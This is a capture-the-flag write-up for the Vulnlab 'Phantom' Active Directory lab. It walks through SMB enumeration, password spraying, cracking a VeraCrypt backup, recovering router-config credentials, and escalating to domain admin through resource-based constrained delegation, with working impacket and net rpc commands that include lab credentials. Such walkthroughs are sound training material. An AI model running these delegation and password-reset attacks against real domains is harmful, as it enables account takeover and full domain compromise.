# Vulnlab - Phantom
```bash
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
```
Enumerating smb shares with anonymous login
From the `public` share, we have tech support mail file
Which has a base64 encoded pdf file
After decoding it from base64, we'll get a password from this file
We don't have a username yet, so bruteforcing SIDs for the username using `lookupsid` from impacket
Spraying the password on all these users, only `ibryant` will be the account that has this password set
After logging onto `Departments Share` , there's a backup file in the IT folder
The `.hc` extension tells that it's file from veracrypt software, as the name tells it encrypts data, this password can be cracked with hashcat but it wasn't present in rockyou.txt, so generating a custom wordlist, with company name, year and a special character as mention in the hint from vulnlab wiki
Mounting the image with veracrypt
There's a vyos backup file, which is an open source OS for router and firewall, from the config file, we can retreive the password for lstanely
Which didn't worked but we can spary this password against the list of domain users that we have
This user can login through winrm
Enumerating the domain with bloodhound, we can change password for domain users with `ForceChangePassword`
These users belong to `ICT Security` group which have `AddAllowedToAct` on domain controller, through this we can edit `msDS-AllowedToActOnBehalfOfOtherIdentity` to add a machine account in this property to perform Resource Based Constrained Delegation (RBCD), with `net rpc` password can be changed
```bash
net rpc password WSILVA -U phantom.vl/svc_sspr -S dc.phantom.vl
```
Editing the msDS-AllowedToActOnBehalfOfOtherIdentity property
```bash
rbcd.py -delegate-to 'DC$' -delegate-from 'WSILVA' -dc-ip 10.10.118.204 -action 'write' 'phantom.vl'/'WSILVA':'Phantom2023!'
```
To abuse RBCD, we need to first know the status of machine qouta in order to create a machine account and then add to DC's property but qouta is set to 0
However we can still perform RBCD through a normal domain user, for this we need a modified branch of getST with U2U kerberos extension https://github.com/ShutdownRepo/impacket/tree/getST
Frist retrieving TGT with overpass-the-hash, extracting the TGT session key and replacing it with the domain user's NTHash
With S4U2Self and U2U, with WSILVA we can obtain a service ticket to itself on behalf of administrator and then proceed to S4U2proxy to obtain a service ticket to the target the user can delegate to.
```bash
KRB5CCNAME=./WSILVA.ccache getST.py -u2u -impersonate "Administrator" -spn "host/dc.phantom.vl" -k -no-pass phantom.vl/WSILVA
```
# References
- https://github.com/lvaccaro/truecrack
- https://codeonby.com/2022/01/19/brute-force-veracrypt-encryption/
- https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd
- https://github.com/ShutdownRepo/impacket/tree/getST
- https://github.com/GhostPack/Rubeus/pull/137